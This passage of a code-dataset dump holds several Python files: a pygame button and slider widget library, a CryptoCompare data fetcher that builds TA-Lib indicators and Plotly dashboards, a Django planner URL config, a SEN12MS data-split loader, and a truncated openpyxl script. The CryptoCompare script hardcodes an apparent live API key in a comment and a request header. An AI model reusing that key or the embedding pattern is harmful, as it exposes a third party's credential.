self.y\r\n self.y += ydif\r\n self.rendered_text.set_y(self.rendered_text.y + ydif)\r\n\r\n def get_text(self):\r\n return self.text\r\n\r\n def get_label(self):\r\n return self.rendered_text\r\n\r\n def set_text_size(self, size):\r\n self.text_size = size\r\n self.render_text()\r\n\r\n def set_fColor(self, color):\r\n self.fColor = color\r\n if not self.is_clicked and not self.is_hovered:\r\n self.currentFillColor = self.fColor\r\n\r\n def set_hoverColor(self, color):\r\n self.onHoverColor = color\r\n if self.is_hovered and not self.is_clicked:\r\n self.currentFillColor = self.onHoverColor\r\n\r\n def set_holdColor(self, color):\r\n self.onHoldColor = color\r\n if not self.is_hovered and self.is_clicked:\r\n self.currentFillColor = self.onHoldColor\r\n\r\n def set_bColor(self, color):\r\n self.bColor = color\r\n\r\n def reset_color(self):\r\n self.currentFillColor = self.fColor\r\n\r\n def set_active(self, torf):\r\n self.active = torf\r\n\r\n def is_active(self):\r\n return self.active\r\n\r\n def set_visible(self, torf):\r\n self.visible = torf\r\n\r\n def is_visible(self):\r\n return self.visible\r\n\r\n def color_scheme(self, color):\r\n if color == \"black\":\r\n self.fColor = c.BLACK\r\n self.tColor = c.WHITE\r\n self.bColor = c.WHITE\r\n self.onHoverColor = c.grey(100)\r\n self.onHoldColor = c.grey(150)\r\n elif color == \"white\":\r\n self.fColor = c.WHITE\r\n self.tColor = c.BLACK\r\n self.bColor = c.BLACK\r\n self.onHoverColor = c.grey(200)\r\n self.onHoldColor = c.grey(100)\r\n elif color == \"red\":\r\n self.fColor = c.RED\r\n self.tColor = c.BLACK\r\n self.bColor = c.BLACK\r\n self.onHoverColor = c.basic_color(180, \"r\", 80)\r\n self.onHoldColor = c.basic_color(120, \"r\", 70)\r\n elif color == \"green\":\r\n self.fColor = c.GREEN\r\n self.tColor = c.BLACK\r\n self.bColor = c.BLACK\r\n self.onHoverColor = c.basic_color(180, \"g\", 80)\r\n self.onHoldColor = c.basic_color(120, \"g\", 70)\r\n elif color == \"blue\":\r\n self.fColor = c.BLUE\r\n self.tColor = c.BLACK\r\n self.bColor = c.BLACK\r\n self.onHoverColor = c.basic_color(180, \"b\", 80)\r\n self.onHoldColor = c.basic_color(120, \"b\", 70)\r\n self.render_text()\r\n self.reset_color()\r\n\r\n\r\nclass Slider:\r\n def __init__(self, rect, slide_wh, text_slider_percent=50, color=c.WHITE, bColor=c.BLACK, border=1, start_value=0,\r\n end_value=100, slide_value=None, slide_color=c.BLACK, text=\"\", text_size=18, tAlignx=CENTER,\r\n tAligny=CENTER, tColor=c.BLACK, slider_border=5,\r\n butfColor=(255, 255, 255), butbColor=(0, 0, 0), butonHoldColor=(100, 100, 100),\r\n butonHoverColor=(200, 200, 200), buttColor=(0, 0, 0), butborder=1, buttext=\"\", visible=True,\r\n active=True, buttext_size=10):\r\n self.x, self.y, self.w, self.h = rect\r\n self.b = border\r\n self.text_h = (self.h - self.b * 2) * text_slider_percent/100\r\n self.slider_h = (self.h - self.b * 2) - self.text_h\r\n self.slide_x1 = self.x + self.b + slider_border\r\n self.slide_x2 = self.x + self.w - self.b - slider_border\r\n self.slide_y = self.y + self.h - self.b - self.slider_h/2\r\n self.slide_button = Button((self.slide_x1 - slide_wh[0]/2, self.slide_y - slide_wh[1]/2, slide_wh[0],\r\n slide_wh[1]),\r\n butfColor, butbColor, butonHoldColor, butonHoverColor, buttColor,\r\n butborder, buttext, visible, active, CENTER, CENTER, buttext_size)\r\n self.slide_color = slide_color\r\n self.color = color\r\n self.bColor = bColor\r\n self.tColor = tColor\r\n self.text = text\r\n self.is_dynamic_text = \"@\" in text\r\n self.text_size = text_size\r\n self.tAlignx = 
tAlignx\r\n self.tAligny = tAligny\r\n self.start_value = start_value\r\n self.end_value = end_value\r\n self.visible = visible\r\n if slide_value is None:\r\n slide_value = start_value\r\n elif slide_value < start_value or slide_value > end_value:\r\n raise Exception(\"Slider value outside of slider range\")\r\n self.slide_value = slide_value\r\n self.buttonx = self.slide_x1 + (self.slide_x2 - self.slide_x1) * self.convert_slider_value_to_percent()\r\n self.slide_button.set_x(self.buttonx - self.slide_button.w/2)\r\n\r\n self.action = self.blank_func\r\n\r\n self.rendered_text = None\r\n self.render_text()\r\n\r\n def draw(self, win):\r\n if self.is_visible():\r\n pygame.draw.rect(win, self.color, self.rect())\r\n self.draw_border(win)\r\n self.draw_slider(win)\r\n self.rendered_text.draw(win)\r\n\r\n def draw_slider(self, win):\r\n pygame.draw.line(win, self.slide_color, (self.slide_x1, self.slide_y), (self.slide_x2, self.slide_y), 3)\r\n self.slide_button.draw(win)\r\n\r\n def draw_border(self, win):\r\n x, y, w, h = self.rect()\r\n pygame.draw.rect(win, self.bColor, (x, y, w, self.b))\r\n pygame.draw.rect(win, self.bColor, (x, y + self.b, self.b, h - self.b))\r\n pygame.draw.rect(win, self.bColor, (x + self.b, y + h - self.b, w - self.b, self.b))\r\n pygame.draw.rect(win, self.bColor, (x + w - self.b, y + self.b, self.b, h - 2 * self.b))\r\n\r\n def dynamic_text(self):\r\n return self.text.replace(\"@\", str(int(self.slide_value)))\r\n\r\n # returns the slider's value\r\n def value(self):\r\n return self.slide_value\r\n\r\n # empty function (to be replaced by custom functions in instantiated button objects)\r\n def blank_func(self, blank):\r\n pass\r\n\r\n # renders text drawable\r\n def render_text(self):\r\n self.rendered_text = label.Label(self.dynamic_text(), color=self.tColor, size=self.text_size)\r\n self.reset_text_pos()\r\n\r\n # sets text drawable position (based on alignment)\r\n def reset_text_pos(self):\r\n self.rendered_text.set_x(self.x + (self.w - self.rendered_text.get_width()) * self.tAlignx)\r\n self.rendered_text.set_y(self.y + self.b + (self.text_h - self.rendered_text.get_height()) * self.tAligny)\r\n\r\n def convert_slider_pos_to_percent(self):\r\n return (self.buttonx - self.slide_x1) / (self.slide_x2 - self.slide_x1)\r\n\r\n def convert_slider_value_to_percent(self):\r\n return (self.slide_value - self.start_value) / (self.end_value - self.start_value)\r\n\r\n def rect(self):\r\n return self.x, self.y, self.w, self.h\r\n\r\n def process(self, click_bool, release_bool, mousepos):\r\n if (self.slide_button.is_hover(mousepos) or self.slide_button.is_clicked) and self.slide_button.is_active():\r\n if click_bool:\r\n self.slide_button.on_click_default()\r\n elif release_bool and self.slide_button.is_clicked:\r\n self.slide_button.on_release_default()\r\n else:\r\n self.slide_button.on_hover()\r\n else:\r\n self.slide_button.reset_color()\r\n\r\n if self.slide_button.is_clicked:\r\n x = mousepos[0]\r\n if x < self.slide_x1:\r\n x = self.slide_x1\r\n elif x > self.slide_x2:\r\n x = self.slide_x2\r\n self.slide_button.set_x(int(x - self.slide_button.w/2))\r\n self.buttonx = x\r\n\r\n self.slide_value = self.start_value + (self.end_value - self.start_value) * self.convert_slider_pos_to_percent()\r\n\r\n if self.is_dynamic_text:\r\n self.render_text()\r\n\r\n self.action(self)\r\n\r\n def is_visible(self):\r\n return self.visible\r\n\r\n def get_label(self):\r\n return self.rendered_text\r\n\r\n def set_text_size(self, size):\r\n self.text_size = size\r\n 
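# The slider maps between pixel position and value by linear interpolation,
# as in convert_slider_value_to_percent() above:
#   percent  = (value - start_value) / (end_value - start_value)
#   button_x = slide_x1 + (slide_x2 - slide_x1) * percent
# Worked check: value 25 on a 0..100 slider whose track runs from x=110 to
# x=310 sits a quarter of the way along, at x = 160:
assert 110 + (310 - 110) * ((25 - 0) / (100 - 0)) == 160.0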
self.render_text()\r\n\r\n def set_value(self, v):\r\n self.slide_value = v\r\n if self.slide_value < self.start_value or self.slide_value > self.end_value:\r\n raise Exception(\"Slider value outside of slider range\")\r\n self.buttonx = self.slide_x1 + (self.slide_x2 - self.slide_x1) * self.convert_slider_value_to_percent()\r\n self.slide_button.set_x(self.buttonx - self.slide_button.w / 2)\r\n","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":16789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"206716000","text":"import pandas as pd\nimport talib\nimport numpy as np\nimport requests\nimport os\nimport colorama\nimport plotly.graph_objs as go\nimport plotly.offline as offline\nfrom plotly import tools\nfrom configs.vars import *\nfrom termcolor import cprint\ncolorama.init()\n# 3d7d3e9e6006669ac00584978342451c95c3c78421268ff7aeef69995f9a09ce\n\n# TODO\n# X fazer com que a database seja salva com todos os indicadores\n# - organizar essas funçoes em uma classe\n# - fazer com que o environment load essa database\n# - copiar o step de algum bom trading env para o train_trading_bot.py\n# - ter uma flag para exibir esses indicadores\n\nsymbol_id_dict = {\n 'BTC': 1182,\n 'ETH': 7605,\n 'LTC': 3808,\n 'DASH': 3807,\n 'XMR': 5038,\n 'ETC': 5324,\n 'XRP': 5031\n }\n#------------------------------------------------------------->\nif not (os.path.exists('datasets/ETH-BTC.csv')):\n cprint('> downloading', 'yellow', attrs=['bold'])\n headers = {'User-Agent': 'Mozilla/5.0', 'authorization': 'Apikey 3d7d3e9e6006669ac00584978342451c95c3c78421268ff7aeef69995f9a09ce'}\n\n # OHLC\n url = 'https://min-api.cryptocompare.com/data/histohour?fsym=ETH&tsym=BTC&e=Binance&limit=2000'\n response = requests.get(url, headers=headers)\n json_response = response.json()\n result = json_response['Data']\n # df = pd.DataFrame(result)\n df1 = pd.DataFrame(result)\n\n # social\n url = 'https://min-api.cryptocompare.com/data/social/coin/histo/hour?coinId=7605&limit=2000'\n response = requests.get(url, headers=headers)\n json_response = response.json()\n result = json_response['Data']\n df2 = pd.DataFrame(result)\n\n # #merge\n df = pd.merge(df1, df2, on='time')\n df['Date'] = pd.to_datetime(df['time'], utc=True, unit='s')\n df.drop('time', axis=1, inplace=True)\n df.set_index('Date', inplace=True)\n\n # indicators\n # https://github.com/mrjbq7/ta-lib/blob/master/docs/func.md\n open_price, high, low, close = np.array(df['open']), np.array(df['high']), np.array(df['low']), np.array(df['close'])\n volume = np.array(df['volumefrom'])\n # cycle indicators\n df.loc[:, 'HT_DCPERIOD'] = talib.HT_DCPERIOD(close)\n df.loc[:, 'HT_DCPHASE'] = talib.HT_DCPHASE(close)\n df.loc[:, 'HT_PHASOR_inphase'], df.loc[:, 'HT_PHASOR_quadrature'] = talib.HT_PHASOR(close)\n df.loc[:, 'HT_SINE_sine'], df.loc[:, 'HT_SINE_leadsine'] = talib.HT_SINE(close)\n df.loc[:, 'HT_TRENDMODE'] = talib.HT_TRENDMODE(close)\n # momemtum indicators\n df.loc[:, 'ADX'] = talib.ADX(high, low, close, timeperiod=14)\n df.loc[:, 'ADXR'] = talib.ADXR(high, low, close, timeperiod=14)\n df.loc[:, 'APO'] = talib.APO(close, fastperiod=12, slowperiod=26, matype=0)\n df.loc[:, 'AROON_down'], df.loc[:, 'AROON_up'] = talib.AROON(high, low, timeperiod=14)\n df.loc[:, 'AROONOSC'] = talib.AROONOSC(high, low, timeperiod=14)\n df.loc[:, 'BOP'] = talib.BOP(open_price, high, low, close)\n df.loc[:, 'CCI'] = talib.CCI(high, low, close, timeperiod=14)\n df.loc[:, 'CMO'] = talib.CMO(close, 
timeperiod=14)\n df.loc[:, 'DX'] = talib.DX(high, low, close, timeperiod=14)\n df['MACD'], df['MACD_signal'], df['MACD_hist'] = talib.MACD(close, fastperiod=12, slowperiod=26, signalperiod=9)\n df.loc[:, 'MFI'] = talib.MFI(high, low, close, volume, timeperiod=14)\n df.loc[:, 'MINUS_DI'] = talib.MINUS_DI(high, low, close, timeperiod=14)\n df.loc[:, 'MINUS_DM'] = talib.MINUS_DM(high, low, timeperiod=14)\n df.loc[:, 'MOM'] = talib.MOM(close, timeperiod=10)\n df.loc[:, 'PPO'] = talib.PPO(close, fastperiod=12, slowperiod=26, matype=0)\n df.loc[:, 'ROC'] = talib.ROC(close, timeperiod=10)\n df.loc[:, 'RSI'] = talib.RSI(close, timeperiod=14)\n df.loc[:, 'STOCH_k'], df.loc[:, 'STOCH_d'] = talib.STOCH(high, low, close, fastk_period=5, slowk_period=3, slowk_matype=0, slowd_period=3, slowd_matype=0)\n df.loc[:, 'STOCHF_k'], df.loc[:, 'STOCHF_d'] = talib.STOCHF(high, low, close, fastk_period=5, fastd_period=3, fastd_matype=0)\n df.loc[:, 'STOCHRSI_K'], df.loc[:, 'STOCHRSI_D'] = talib.STOCHRSI(close, timeperiod=14, fastk_period=5, fastd_period=3, fastd_matype=0)\n df.loc[:, 'TRIX'] = talib.TRIX(close, timeperiod=30)\n df.loc[:, 'ULTOSC'] = talib.ULTOSC(high, low, close, timeperiod1=7, timeperiod2=14, timeperiod3=28)\n df.loc[:, 'WILLR'] = talib.WILLR(high, low, close, timeperiod=14)\n # overlap studies\n df.loc[:, 'BBANDS_upper'], df.loc[:, 'BBANDS_middle'], df.loc[:, 'BBANDS_lower'] = talib.BBANDS(close, timeperiod=5, nbdevup=2, nbdevdn=2, matype=0)\n df.loc[:, 'DEMA'] = talib.DEMA(close, timeperiod=30)\n df.loc[:, 'EMA'] = talib.EMA(close, timeperiod=30)\n df.loc[:, 'HT_TRENDLINE'] = talib.HT_TRENDLINE(close)\n df.loc[:, 'KAMA'] = talib.KAMA(close, timeperiod=30)\n df.loc[:, 'MA'] = talib.MA(close, timeperiod=30, matype=0)\n df.loc[:, 'MIDPOINT'] = talib.MIDPOINT(close, timeperiod=14)\n df.loc[:, 'WMA'] = talib.WMA(close, timeperiod=30)\n df.loc[:, 'SMA'] = talib.SMA(close)\n # pattern recoginition\n df.loc[:, 'CDL2CROWS'] = talib.CDL2CROWS(open_price, high, low, close)\n df.loc[:, 'CDL3BLACKCROWS'] = talib.CDL3BLACKCROWS(open_price, high, low, close)\n df.loc[:, 'CDL3INSIDE'] = talib.CDL3INSIDE(open_price, high, low, close)\n df.loc[:, 'CDL3LINESTRIKE'] = talib.CDL3LINESTRIKE(open_price, high, low, close)\n # price transform\n df.loc[:, 'WCLPRICE'] = talib.WCLPRICE(high, low, close)\n # statistic funcitons\n df.loc[:, 'BETA'] = talib.BETA(high, low, timeperiod=5)\n df.loc[:, 'CORREL'] = talib.CORREL(high, low, timeperiod=30)\n df.loc[:, 'STDDEV'] = talib.STDDEV(close, timeperiod=5, nbdev=1)\n df.loc[:, 'TSF'] = talib.TSF(close, timeperiod=14)\n df.loc[:, 'VAR'] = talib.VAR(close, timeperiod=5, nbdev=1)\n # volatility indicators\n df.loc[:, 'ATR'] = talib.ATR(high, low, close, timeperiod=14)\n df.loc[:, 'NATR'] = talib.NATR(high, low, close, timeperiod=14)\n df.loc[:, 'TRANGE'] = talib.TRANGE(high, low, close)\n # volume indicators\n df.loc[:, 'AD'] = talib.AD(high, low, close, volume)\n df.loc[:, 'ADOSC'] = talib.ADOSC(high, low, close, volume, fastperiod=3, slowperiod=10)\n df.loc[:, 'OBV'] = talib.OBV(close, volume)\n\n df.fillna(df.mean(), inplace=True)\n df.to_csv('datasets/ETH-BTC.csv')\n#------------------------------------------------------------->\nelse:\n cprint('> loading from cache')\n df = pd.read_csv('datasets/ETH-BTC.csv')\n#------------------------------------------------------------->\nquit()\nINCREASING_COLOR = 'rgb(41, 127, 255)'\nDECREASING_COLOR = 'rgb(255, 170, 0)'\n# plot 1 dashboard\ndata = [ dict(\n type = 'candlestick',\n open = df['open'],\n high = df['high'],\n low = 
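# The indicator block above follows the usual TA-Lib convention: inputs are
# float64 numpy arrays, and each output carries NaNs until its lookback
# window fills (hence the df.fillna(df.mean()) at the end). Minimal check:
import numpy as np
import talib

close = np.asarray([44.0, 44.3, 44.1, 44.2, 44.5, 44.8, 45.0, 45.1,
                    45.4, 45.2, 45.6, 45.4, 45.9, 46.1, 46.3])
rsi = talib.RSI(close, timeperiod=14)
assert np.isnan(rsi[:14]).all()  # no value until `timeperiod` samples exist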
df['low'],\n close = df['close'],\n x = df['Date'],\n yaxis = 'y2',\n name = 'Price',\n increasing = dict( line = dict( color = INCREASING_COLOR ) ),\n decreasing = dict( line = dict( color = DECREASING_COLOR ) ),\n) ]\n\nlayout=dict()\n\nfig = dict( data=data, layout=layout )\n\nfig['layout'] = dict()\nfig['layout']['title'] = 'Dashboard 1'\nfig['layout']['plot_bgcolor'] = '#2d2929'\nfig['layout']['paper_bgcolor'] = '#2d2929'\nfig['layout']['font'] = dict(color='rgb(255, 255, 255)', size=17)\nfig['layout']['xaxis'] = dict(rangeslider=dict(visible=False), rangeselector=dict(visible=True))\nfig['layout']['yaxis'] = dict(domain=[0, 0.2], showticklabels=False)\nfig['layout']['yaxis2'] = dict(domain=[0.2, 0.8])\nrangeselector = dict(\n visibe = True,\n x = 0, y = 0.9,\n bgcolor = 'rgba(150, 200, 250, 0.4)',\n font = dict( size = 13 ),\n buttons=list([\n dict(count=1,\n label='1 day',\n step='day',\n stepmode='backward'),\n dict(count=7,\n label='7 days',\n step='day',\n stepmode='backward'),\n dict(count=15,\n label='15 days',\n step='day',\n stepmode='backward'),\n dict(count=1,\n label='1 mo',\n step='month',\n stepmode='backward'),\n dict(step='all')\n ]))\nfig['layout']['xaxis']['rangeselector'] = rangeselector\nfig['data'].append( dict( x=df['Date'], y=df['SMA'], type='scatter', mode='lines',\n yaxis='y2', name='Moving Average' ) )\n\ncolors = []\nfor i in range(len(df['close'])):\n if i != 0:\n if df['close'][i] > df['close'][i-1]:\n colors.append(INCREASING_COLOR)\n else:\n colors.append(DECREASING_COLOR)\n else:\n colors.append(DECREASING_COLOR)\n\nfig['data'].append(dict(x=df['Date'], y=df['volumeto'],\n marker=dict( color=colors),\n type='bar', yaxis='y', name='Volume'))\n\noffline.plot(fig, filename='docs/dashboard_1.html', validate=False)\n\n# plot 2 dashboard\nDASH1 = ['analysis_page_views','charts_page_views','comments','fb_likes','fb_talking_about']\nfig = tools.make_subplots(rows=5, cols=1, subplot_titles=DASH1)\ntrace = go.Scatter(x=df['Date'], y=df['analysis_page_views'].pct_change(), name='analysis_page_views pct_change', fill='tonexty', mode='none')\nfig.append_trace(trace, 1, 1)\ntrace = go.Scatter(x=df['Date'], y=df['charts_page_views'].pct_change(), name='charts_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 2, 1)\ntrace = go.Bar(x=df['Date'], y=df['comments'].pct_change(), name='comments pct change')\nfig.append_trace(trace, 3, 1)\ntrace = go.Scatter(x=df['Date'], y=df['fb_likes'], name='fb_likes', fill='tonexty', mode='none')\nfig.append_trace(trace, 4, 1)\ntrace = go.Scatter(x=df['Date'], y=df['fb_talking_about'], name='fb_talking_about', fill='tonexty', mode='none')\nfig.append_trace(trace, 5, 1)\nfig['layout'].update(title='Dashboard 2',\n font=dict(color='rgb(255, 255, 255)', size=16),\n paper_bgcolor='#2d2929',\n plot_bgcolor='#2d2929')\noffline.plot(fig, filename='docs/dashboard_2.html')\n\n# plot 3 dashboard\nDASH2 = ['followers','forum_page_views', 'influence_page_views','markets_page_views','overview_page_views']\nfig = tools.make_subplots(rows=5, cols=1, subplot_titles=DASH2)\ntrace = go.Bar(x=df['Date'], y=df['followers'].pct_change(), name='followers pct change')\nfig.append_trace(trace, 1, 1)\ntrace = go.Scatter(x=df['Date'], y=df['forum_page_views'].pct_change(), name='forum_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 2, 1)\ntrace = go.Scatter(x=df['Date'], y=df['influence_page_views'].pct_change(), name='influence_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 
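# The social-metric panels above plot pandas pct_change(), i.e.
# (x_t - x_{t-1}) / x_{t-1}, with NaN for the first sample. Quick check:
import pandas as pd

s = pd.Series([100.0, 110.0, 99.0])
assert abs(s.pct_change().iloc[1] - 0.10) < 1e-12    # 100 -> 110 is +10%
assert abs(s.pct_change().iloc[2] - (-0.10)) < 1e-12  # 110 -> 99 is -10%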
3, 1)\ntrace = go.Scatter(x=df['Date'], y=df['markets_page_views'].pct_change(), name='markets_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 4, 1)\ntrace = go.Scatter(x=df['Date'], y=df['overview_page_views'].pct_change(), name='overview_page_views pct change', fill='tonexty', mode='none')\nfig.append_trace(trace, 5, 1)\nfig['layout'].update(title='Dashboard 3',\n font=dict(color='rgb(255, 255, 255)', size=16),\n paper_bgcolor='#2d2929',\n plot_bgcolor='#2d2929')\noffline.plot(fig, filename='docs/dashboard_3.html')","sub_path":"cryptocompare_api.py","file_name":"cryptocompare_api.py","file_ext":"py","file_size_in_byte":11194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"303948551","text":"\"\"\"planner URL Configuration\"\"\"\n\nfrom django.urls import path\nfrom django.urls import include\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import static, staticfiles_urlpatterns\nfrom django.views.generic.base import RedirectView\nfrom django.conf import settings\nfrom django.views.i18n import JavaScriptCatalog\nfrom planner import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('admin/jsi18n', JavaScriptCatalog.as_view(), name='javascript-catalog'),\n path('favicon.ico', RedirectView.as_view(url='/static/favicon.ico')),\n\n path('', views.Dashboard.as_view(), name='home_page'),\n\n path('deal/', views.DealList.as_view(), name='deal_list'),\n path('deal//change/', views.DealUpdate.as_view(), name='deal_update'),\n path('deal/add/', views.DealCreate.as_view(), name='deal_add'),\n path('deal//delete/', views.DealDelete.as_view(), name='deal_delete'),\n path('deal//calculation/', views.DealCalc.as_view(), name='calculation'),\n\n path('project/', views.TaskList.as_view(), name='task_list'),\n path('project//change/', views.TaskUpdate.as_view(), name='task_update'),\n path('project/add/', views.TaskCreate.as_view(), name='task_add'),\n path('project//delete/', views.TaskDelete.as_view(), name='task_delete'),\n path('project//', views.TaskDetail.as_view(), name='task_detail'),\n path('project/exchange/', views.TaskExchange.as_view(), name='task_exchange'),\n\n #path('sprint//week//', views.SprintList.as_view(), name='sprint_list'),\n path('sprint/', views.SprintList.as_view(), name='sprint_list'),\n\n path('execution//status//',\n views.ExecutionStatusChange.as_view(), name='execution_status_change'),\n\n path('receiver/', views.ReceiverList.as_view(), name='receiver_list'),\n path('receiver/add', views.ReceiverCreate.as_view(), name='receiver_add'),\n path('receiver//change/', views.ReceiverUpdate.as_view(), name='receiver_update'),\n path('receiver//delete/', views.ReceiverDelete.as_view(), name='receiver_delete'),\n\n path('project/types/', views.ProjectList.as_view(), name='project_type_list'),\n path('project/types/add/', views.ProjectCreate.as_view(), name='project_type_add'),\n path('project/types//change/', views.ProjectUpdate.as_view(), name='project_type_update'),\n path('project/types//delete/', views.ProjectDelete.as_view(), name='project_type_delete'),\n # path('project/registry/', views.TaskRegistry.as_view(), name='task_registry'),\n\n path('customer/', views.CustomerList.as_view(), name='customer_list'),\n path('customer/add', views.CustomerCreate.as_view(), name='customer_add'),\n path('customer//change/', views.CustomerUpdate.as_view(), name='customer_update'),\n path('customer//delete/', views.CustomerDelete.as_view(), name='customer_delete'),\n\n 
path('company/', views.CompanyList.as_view(), name='company_list'),\n path('company/add', views.CompanyCreate.as_view(), name='company_add'),\n path('company//change/', views.CompanyUpdate.as_view(), name='company_update'),\n path('company//delete/', views.CompanyDelete.as_view(), name='company_delete'),\n\n path('contractor/', views.ContractorList.as_view(), name='contractor_list'),\n path('contractor/add', views.ContractorCreate.as_view(), name='contractor_add'),\n path('contractor//change/', views.ContractorUpdate.as_view(), name='contractor_update'),\n path('contractor//delete/', views.ContractorDelete.as_view(), name='contractor_delete'),\n\n path('subtask//', views.SubtaskDetail.as_view(), name='subtask_detail'),\n path('inttask//', views.InttaskDetail.as_view(), name='inttask_detail'),\n path('login/', views.login_page, name='login_page'),\n path('logout/', views.logout_page, name='logout_page'),\n\n path('colleagues/', views.СolleaguesList.as_view(), name='colleagues_list'),\n path('colleagues//detail/', views.СolleaguesDetail.as_view(), name='colleagues_detail'),\n\n path('employee/', views.EmployeeList.as_view(), name='employee_list'),\n path('employee/add', views.EmployeeCreate.as_view(), name='employee_add'),\n path('employee//change/', views.EmployeeUpdate.as_view(), name='employee_update'),\n path('employee/change/', views.EmployeeSelfUpdate.as_view(), name='employee_self_update'),\n path('employee//bonus///',\n views.BonusesCalc.as_view(), name='bonus_calc'),\n\n path('news/', views.NewsList.as_view(), name='news_list'),\n path('news//detail/', views.NewsDetail.as_view(), name='news_detail'),\n path('news//change/', views.NewsUpdate.as_view(), name='news_update'),\n path('news/add/', views.NewsCreate.as_view(), name='news_add'),\n path('news//delete/', views.NewsDelete.as_view(), name='news_delete'),\n\n path('event/', views.EventList.as_view(), name='event_list'),\n path('event//detail/', views.EventDetail.as_view(), name='event_detail'),\n path('event//change/', views.EventUpdate.as_view(), name='event_update'),\n path('event/add/', views.EventCreate.as_view(), name='event_add'),\n path('event//delete/', views.EventDelete.as_view(), name='event_delete'),\n\n\n path('select2/', include('django_select2.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += staticfiles_urlpatterns()\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"planner/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"523102381","text":"import numpy as np\r\nfrom tqdm import tqdm\r\nfrom sen12ms_dataLoader import *\r\n\r\ndef load_data(args):\r\n # s1_trn=[]\r\n # s2_trn=[]\r\n # y_trn=[]\r\n # s1_val=[]\r\n # s2_val=[]\r\n # y_val=[]\r\n\r\n print('Loading data...')\r\n\r\n sen12ms = SEN12MSDataset(\"/data/PublicData/DF2020/trn/\")\r\n\r\n IDs = np.load('/data/PublicData/DF2020/trn/clean.npy')\r\n\r\n N = IDs.shape[0]\r\n\r\n # for i in tqdm([Seasons.SPRING,Seasons.SUMMER,Seasons.FALL,Seasons.WINTER]):\r\n #\r\n # s1_data, s2_data, y_data = sen12ms.get_triplets(i, s1_bands=S1Bands.ALL,\r\n # s2_bands=S2Bands.ALL, lc_bands=LCBands.ALL)\r\n\r\n\r\n #N=len(s1_data)\r\n\r\n #s1_data=IDs\r\n # s2_data=IDs\r\n # y_data=IDs\r\n\r\n #s1_data=np.array(s1_data)\r\n # s2_data=np.array(s2_data)\r\n # y_data=np.array(y_data)\r\n\r\n idx=np.arange(N)\r\n np.random.shuffle(idx)\r\n\r\n trn_ids=IDs[idx[:int(N * args.trn_ratio)],:]\r\n val_ids=IDs[idx[int(N 
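# The split above is the common shuffle-then-slice recipe. Self-contained
# illustration with an 80/10 train/val split (the ratios are the script's CLI
# arguments; the concrete numbers here are only for the example):
import numpy as np

N, trn_ratio, val_ratio = 100, 0.8, 0.1
idx = np.arange(N)
np.random.shuffle(idx)
trn = idx[:int(N * trn_ratio)]
val = idx[int(N * trn_ratio):int(N * (trn_ratio + val_ratio))]
assert len(trn) == 80 and len(val) == 10
assert set(trn).isdisjoint(val)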
* args.trn_ratio):int(N * (args.trn_ratio + args.val_ratio))],:]\r\n\r\n # s1_trn.extend(s1_data[idx[:int(N * args.trn_ratio)]])\r\n # s1_val.extend(s1_data[idx[int(N * args.trn_ratio):int(N * (args.trn_ratio + args.val_ratio))]])\r\n\r\n # s2_trn.extend(s2_data[idx[:int(N * args.trn_ratio)]])\r\n # s2_val.extend(s2_data[idx[int(N * args.trn_ratio):int(N * (args.trn_ratio + args.val_ratio))]])\r\n #\r\n # y_trn.extend(y_data[idx[:int(N * args.trn_ratio)]])\r\n # y_val.extend(y_data[idx[int(N * args.trn_ratio):int(N * (args.trn_ratio + args.val_ratio))]])\r\n\r\n #s1_trn=np.stack(s1_trn,axis=0)\r\n # s2_trn=np.stack(s2_trn,axis=0)\r\n # y_trn=np.stack(y_trn,axis=0)\r\n\r\n #s1_val=np.stack(s1_val,axis=0)\r\n # s2_val=np.stack(s2_val,axis=0)\r\n # y_val=np.stack(y_val,axis=0)\r\n\r\n s1_trn_name=[]\r\n s2_trn_name=[]\r\n y_trn_name=[]\r\n\r\n s1_val_name = []\r\n s2_val_name = []\r\n y_val_name = []\r\n\r\n season_dict={1:Seasons.SPRING,2:Seasons.SUMMER,3:Seasons.FALL,4:Seasons.WINTER}\r\n\r\n print('loading training files...')\r\n\r\n for i in tqdm(range(trn_ids.shape[0])):\r\n s1_name,s2_name,y_name=sen12ms.get_s1s2lc_triplet(season_dict[trn_ids[i,0]], trn_ids[i,1], trn_ids[i,2],\r\n s1_bands=S1Bands.ALL,s2_bands=S2Bands.ALL, lc_bands=LCBands.ALL)\r\n s1_trn_name.append(s1_name)\r\n s2_trn_name.append(s2_name)\r\n y_trn_name.append(y_name)\r\n\r\n print('loading validation files...')\r\n\r\n for i in tqdm(range(val_ids.shape[0])):\r\n s1_name,s2_name,y_name=sen12ms.get_s1s2lc_triplet(season_dict[val_ids[i,0]], val_ids[i,1], val_ids[i,2],\r\n s1_bands=S1Bands.ALL,s2_bands=S2Bands.ALL, lc_bands=LCBands.ALL)\r\n s1_val_name.append(s1_name)\r\n s2_val_name.append(s2_name)\r\n y_val_name.append(y_name)\r\n\r\n s1_trn_name = np.array(s1_trn_name)\r\n s2_trn_name = np.array(s2_trn_name)\r\n y_trn_name = np.array(y_trn_name)\r\n \r\n s1_val_name = np.array(s1_val_name)\r\n s2_val_name = np.array(s2_val_name)\r\n y_val_name = np.array(y_val_name)\r\n\r\n return s1_trn_name,s2_trn_name,y_trn_name,s1_val_name,s2_val_name,y_val_name\r\n","sub_path":"DataFusion2020_SEMISUPERVISED/preparedata.py","file_name":"preparedata.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"26575749","text":"# -*- coding: utf-8 -*-\nimport openpyxl\n# from random import Random\nfrom datetime import datetime, timedelta, date\nimport random\n\n\ndef RandomOpenid(colume, num):\n sheet = wb.active\n print('''\nPlease enter the first six characters of the openid under this service account, e.g.:\nfor 